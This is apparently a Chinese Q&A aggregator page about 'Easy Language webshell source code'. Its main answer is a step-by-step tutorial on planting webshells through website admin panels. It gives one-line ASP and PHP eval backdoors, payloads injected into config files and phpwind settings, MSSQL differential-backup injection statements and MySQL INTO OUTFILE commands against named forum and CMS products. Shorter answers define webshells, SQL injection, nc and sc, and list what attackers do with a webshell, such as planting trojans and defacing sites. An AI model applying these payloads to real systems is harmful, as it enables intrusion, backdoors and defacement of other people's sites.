導航:首頁 > 源碼編譯 > 易語言webshell源碼

易語言webshell源碼

發布時間:2022-08-04 06:35:25

❶ 如何從後台得到webshell

注意:如何進入後台,不是本文討論范圍,其具體方法就不說了,靠大家去自己發揮。此文參考了前人的多方面的資料和信息,在此一並表示感謝。

一、直接上傳獲得webshell

這種對php和jsp的一些程序比較常見,MolyX BOARD就是其中一例,直接在心情圖標管理上傳.php類型,雖然沒有提示,其實已經成功了,上傳的文件url應該是

,前一陣子的聯眾游戲站和網易的jsp系統漏洞就可以直接上傳jsp文件。文件名是原來的文件名,bo-blog後台可以可以直接上傳.php文件,上傳的文件路徑有提示。以及一年前十分流行的upfile.asp漏洞(動網5.0和6.0、早期的許多整站系統),因過濾上傳文件不嚴,導致用戶可以直接上傳webshell到網站任意可寫目錄中,從而拿到網站的管理員控制許可權。

二、添加修改上傳類型

現在很多的腳本程序上傳模塊不是只允許上傳合法文件類型,而大多數的系統是允許添加上傳類型,bbsxp後台可以添加asaasP類型,ewebeditor的後台也可添加asa類型,通過修改後我們可以直接上傳asa後綴的webshell了,還有一種情況是過濾了.asp,可以添加.aspasp的文件類型來上傳獲得webshell。php系統的後台,我們可以添加.php.g1f的上傳類型,這是php的一個特性,最後的哪個只要不是已知的文件類型即可,php會將php.g1f作為.php來正常運行,從而也可成功拿到shell。LeadBbs3.14後台獲得webshell方法是:在上傳類型中增加asp ,注意,asp後面是有個空格的,然後在前台上傳ASP馬,當然也要在後面加個空格!

三、利用後台管理功能寫入webshell

上傳漏洞基本上補的也差不多了,所以我們進入後台後還可以通過修改相關文件來寫入webshell。比較的典型的有dvbbs6.0,還有leadbbs2.88等,直接在後台修改配置文件,寫入後綴是asp的文件。而LeadBbs3.14後台獲得webshell另一方法是:添加一個新的友情鏈接,在網站名稱處寫上冰狐最小馬即可,最小馬前後要隨便輸入一些字元,http:\網站incIncHtmBoardLink.asp就是我們想要的shell。

四、利用後台管理向配置文件寫webshell

利用"""":""//"等符號構造最小馬寫入程序的配置文件,joekoe論壇,某某同學錄,沸騰展望新聞系統,COCOON Counter統計程序等等,還有很多php程序都可以,COCOON Counter統計程序舉例,在管理郵箱處添上[email protected]":eval request(chr (35))//, 在配製文件中就是webmail="[email protected]":eval request(chr(35))//",還有一種方法就是寫上 [email protected]"%><%eval request(chr(35))%><%',這樣就會形成前後對應,最小馬也就運行了。<%eval request(chr(35))%>可以用lake2的eval發送端以及最新的2006 客戶端來連,需要說明的是資料庫插馬時候要選前者。再如動易2005,到文章中心管理-頂部菜單設置-菜單其它特效,插入一句話馬"%><%execute request("l")%><%',保 存頂部欄目菜單參數設置成功後,我們就得到馬地址http://網站/admin/rootclass_menu_config.asp。


五、利用後台資料庫備份及恢復獲得webshell

主要是利用後台對access資料庫的「備份資料庫」或「恢復資料庫」功能,「備份的資料庫路徑」等變數沒有過濾導致可以把任意文件後綴改 為asp,從而得到webshell,msssql版的程序就直接應用了access版的代碼,導致sql版照樣可以利用。還可以備份網站asp文件為其他後綴 如.txt文件,從而可以查看並獲得網頁源代碼,並獲得更多的程序信息增加獲得webshell的機會。在實際運用中經常會碰到沒有上傳功能的時 候,但是有asp系統在運行,利用此方法來查看源代碼來獲得其資料庫的位置,為資料庫插馬來創造機會,動網論壇就有一個ip地址的資料庫,在後台的ip管理中可以插入最小馬然後備份成.asp文件即可。在談談突破上傳檢測的方法,很多asp程序在即使改了後綴名後也會提示文件非法,通過在.asp文件頭加上gif89a修改後綴為gif來騙過asp程序檢測達到上傳的目的,還有一種就是用記事本打開圖片文件,隨便粘貼一部分復制到asp木馬文件頭,修改gif後綴後上傳也可以突破檢測,然後備份為.asp文件,成功得到webshell。

六、利用資料庫壓縮功能

可以將數據的防下載失效從而使插入資料庫的最小馬成功運行,比較典型的就是loveyuki的L-BLOG,在友情添加的url出寫上<%eval request (chr(35))%>, 提交後,在資料庫操作中壓縮資料庫,可以成功壓縮出.asp文件,用海洋的最小馬的eval客戶端連就得到一個webshell。

七、asp+mssql系統

這里需要提一點動網mssql版,但是可以直接本地提交來備份的。首先在發帖那上傳一個寫有asp代碼的假圖片,然後記住其上傳路徑。寫一個本地提交的表單,代碼如下:

<form action=http://網站/bbs/admin_data.asp?action=RestoreData&act=Restore method="post">

<p>已上傳文件的位置:<input name="Dbpath" type="text" size="80"></p>

<p>要復制到的位置:<input name="backpath" type="text" size="80"></p>

<p><input type="submit" value="提交"></p> </form>

另存為.htm本地執行。把假圖片上傳路徑填在「已上傳文件的位置」那裡,想要備份的WebShell的相對路徑填寫在「要復制到的位置」那裡,提交就得到我們可愛的WebShell了,恢復代碼和此類似,修改相關地方就可以了。沒有遇到過後台執行mssql命令比較強大的asp程序後台,動網的資料庫還原和備份是個擺設,不能執行sql命令備份webshell,只能執行一些簡單的查詢命令。可以利用mssql注入差異備份webshell,一般後台是顯示了絕對路徑,只要有了注入點基本上就可以差異備份成功。下面是差異備份的主要語句代碼,利用動網7.0的注入漏洞可以用差異備份一個webshell,可以用利用上面提到的方法,將conn.asp文件備份成.txt文件而獲得庫名。

差異備份的主要代碼:

;declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x626273 backup database @a to disk=@s--

;Drop table [heige];create table [dbo].[heige] ([cmd] [image])--

;insert into heige(cmd) values()--

;declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x643A5C7765625C312E617370 backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT--

這段代碼中,0x626273是要備份的庫名bbs的十六進制,可以是其他名字比如bbs.bak; 是<%execute request("l")%>的十六進制,是lp最小馬;0x643A5C7765625C312E617370是d:web1.asp的十六進制,也就是你要備份的webshell路徑。當然也可以用比較常見備份方式來獲得webshell,唯一的不足就是備份後的文件過大,如果備份資料庫中有防下載的的數據表,或者有錯誤的asp代碼,備份出來的webshell就不會成功運行,利用差異備份是成功率比較高的方法,並且極大的減少備份文件的大小。

八、php+mysql系統

後台需要有mysql數據查詢功能,我們就可以利用它執行SELECT ... INTO OUTFILE查詢輸出php文件,因為所有的數據是存放在mysql里的,所以我們可以通過正常手段把我們的webshell代碼插入mysql在利用SELECT ... INTO OUTFILE語句導出shell。在mysql操作里輸入select from mysql.user into outfile '路徑』 就可以獲得了一個<?eval($_POST[a]);?>的最小馬' 是我們<?eval($_POST[a]);?>的十六進制,這種方法對phpmyadmin比較普遍,先利用phpmyadmin的路徑泄露漏洞,比較典型的 是http://url/phpmyadmin/libraries/select_lang.lib.php。

就可以暴出路徑,php環境中比較容易暴出絕對路徑:)。提一點的是遇到是mysql在win系統下路徑應該這樣寫d:\wwwroot\a.php。下面的方法是比較常用的一個導出webshell的方法,也可以寫個vbs添加系統管理員的腳本導出到啟動文件夾,系統重起後就會添加一個管理員帳號

CREATE TABLE a(cmd text NOT NULL)

INSERT INTO a(cmd) VALUES('<?fputs(fopen("./a.php","w"),"<?eval($_POST[a]);?>")?>')

select cmd from a into outfile '路徑/b.php'

DROP TABLE IF EXISTS a

訪問b.php就會生成一個<?eval($_POST[a]);?>的最小馬。

如果遇到可以執行php命令就簡單多了,典型的代表是BO-BLOG,在後台的php命令框輸入以下代碼:

<?

$sa = fopen("./up/saiy.php","w");

fwrite($sa,"<?eval($_POST[a]);?".">");

fclose($sa);

?>

就會在up目錄下生成文件名為saiy.php內容為<?eval($_POST[a]);?>的最小php木馬, 最後用lanker的客戶端來連接。實際運用中要考慮到文件夾是否有寫許可權。或者輸入這樣的代碼<?fputs(fopen("./a.php","w"),"<?eval($_POST[a]);?>")?> 將會在當前目錄生成一個a.php的最小馬。

九、phpwind論壇從後台到webshell的三種方式

方式1 模板法

進入後台, 風格模版設置 ,在隨便一行寫代碼,記住,這代碼必須頂著左邊行寫,代碼前面不可以有任何字元。

EOT;

eval($a);

print <<<EOT

而後得到一個shell為http://網站/bbs/index.php。

方始2 臟話過濾法

進入安全管理 ◇ 不良詞語過濾。新增不良詞語寫 a』]=』aa』;eval($_POST[』a』]);//

替換為那裡可以隨意寫,而後得到一個shell地址為http://網站/bbs/data/bbscache/wordsfb.php。

方式3 用戶等級管理

新建立會員組,頭銜你可以隨便寫,但是千萬不要寫單雙引號特殊符號,升級圖片號寫a』;eval($_POST[』a』]);// ,升級點數依然可以隨意寫。而後得到一個shell地址為http://網站/bbs/data/bbscache/level.php。

以上三種方式得到webshellr的密碼是a,為lanker的一句話後門服務端。

十、也可以利用網站訪問計數系統記錄來獲得webshell

最明顯的就是某私服程序內的阿江計數程序,可以通過http://網站/stat.asp?style=textreferer= 代碼內容&screenwidth=1024直接提交, 即可把代碼內容直接插入到計數系統的資料庫中,而此系統默認資料庫為count#.asa,我們可以通過http://網站/count%23.asa訪問得到webshell,由於阿江計數程序過濾了%和+,將最小馬改成<SCRIPT RUNAT=SERVER LANGUAGE=vbSCRIPT>eval(Request("1"))</SCRIPT>替換代碼內容處提交,然後用lake2的eval客戶端來提交,值得一提的是如果進到計數後台,可以清理某時某刻的數據,一旦插入asp木馬失敗,可以清理資料庫再次操作。

❷ 學習拿webshell需要學那些東西

Webshell的過程和Hack是一樣的..
你學的東西會很多很廣!
不藉助任何工具不是不可能,但是很麻煩..
首先你要熟悉SQL,Mysql,DB2,oracle有較深刻的了解!
熟練使用T-SQL語句等對頁面進行注入等審查,踩點工作..
熟悉一個或多種B/S語言,如asp,Jsp,ASP.Net.PHP等..
幫助頁面弱點的分析工作..
最起碼你能讀懂一篇源碼並且分析透徹..
較深刻的了解網路知識,對網站伺服器能正常的掃描,踩點,弱點探測。Siff等..
或者對其已知網路進行進一步掃描取證..
獲取你想了解的東西!
密碼字典的分析和製作,需要密碼破解的地方就需要字典..
需要從你收集的資料裡面提取!
<社會工程學>
還有一個東西是搞Hack必須掌握的,就是跳板技術!
別你搞了人家半天,警察就找上門了!
跳板技術是一個很深刻的學問..
我上面只列出一些小的基本知識,具體按情況而定!
東西是死的,Hack是活的!

❸ 什麼叫webshell ,什麼叫注入,什麼叫旁註,還有一些常用工具的功能,比如nc,sc等等

webshell,我們常常稱其為匿名的用戶,ws是通過網路中的各種網站的埠進行突破的,繼而對其伺服器進行一定許可權的設置等。

注入:是注入一個可以進行的網址...通常用於連接公司、學校或辦公的資料庫的!
旁註則是可以在主機上建一個虛擬站點然後進行進行滲透,得到所要得到一個重要關節webshell,再開放的程序及一些非安全設置進行的跨站式入侵方法,然後就可以侵入其伺服器啦。呵呵

NC:全名Network Computer,是基於網路計算環境的一種計算設備,可以實現Internet功能,通過網路進行信息查詢和信息處理。
SC:是一套XP系統中功能強大的DOS命令,能與「服務控制器」和已安裝設備進行通訊。
SC命令的功能有
1、可以檢索和設置有關服務的控制信息,可以測試和調試服務程序。
2、可以設置存儲在注冊表中的服務屬性,以控制如何在啟動時啟動服務應用程序,以及如何將其作為後台程序運行。即更改服務的啟動狀態。
3、可以用來刪除系統中的無用的服務
4、其參數可以配置指定的服務,檢索當前服務的狀態,也可以停止和啟動服務
5、可以創建批處理文件來調用不同的SC命令,以自動啟動或關閉服務序列。

❹ 拿到網站的webshell有什麼作用

1.拿到webshell 一般就拿到了網站伺服器GUEST許可權(IIS>60的情況),tomact默認windows情況下是SYStem許可權,WEBSHELL對愛提權的人來講是 GUSTES 許可權到administrator許可權的過度。
2.對不愛提權的人來講,可以掛馬(掛上自己的盜號木馬),可也改主業 等等。,
3.還可以上傳文件,打包源碼等等。如上傳文件的利用可以用來提權,那些功能都是相互交叉的 呵呵。。。
END.

❺ 網站被別人掛馬了。webshell

殺病毒啊,網站掛木馬現在已經很常見了。
如果病毒殺不掉的話建議你重裝下系統。

閱讀全文

與易語言webshell源碼相關的資料

熱點內容
centos解壓縮zip 瀏覽:387
我的世界怎麼用命令風塊取消指令 瀏覽:1000
安卓軟體請求超時怎麼辦 瀏覽:476
androidapp調用另一個app 瀏覽:621
數控銑床法蘭克子程序編程 瀏覽:173
linux打包命令targz 瀏覽:996
抖音app是哪個 瀏覽:407
蘋果app怎麼上架 瀏覽:255
NA伺服器地址 瀏覽:427
我的世界如何初始化伺服器 瀏覽:97
哪個手機app天氣預報最准 瀏覽:752
怎樣把視頻壓縮至25m 瀏覽:570
vivox27文件夾怎麼改變 瀏覽:727
新手玩狼人殺用什麼app 瀏覽:615
pdf在線查看 瀏覽:954
安卓tv90如何關閉後台 瀏覽:683
php讀取word亂碼 瀏覽:755
minicom源碼 瀏覽:1001
海爾冷櫃壓縮機 瀏覽:417
聯通伺服器如何調試信號 瀏覽:136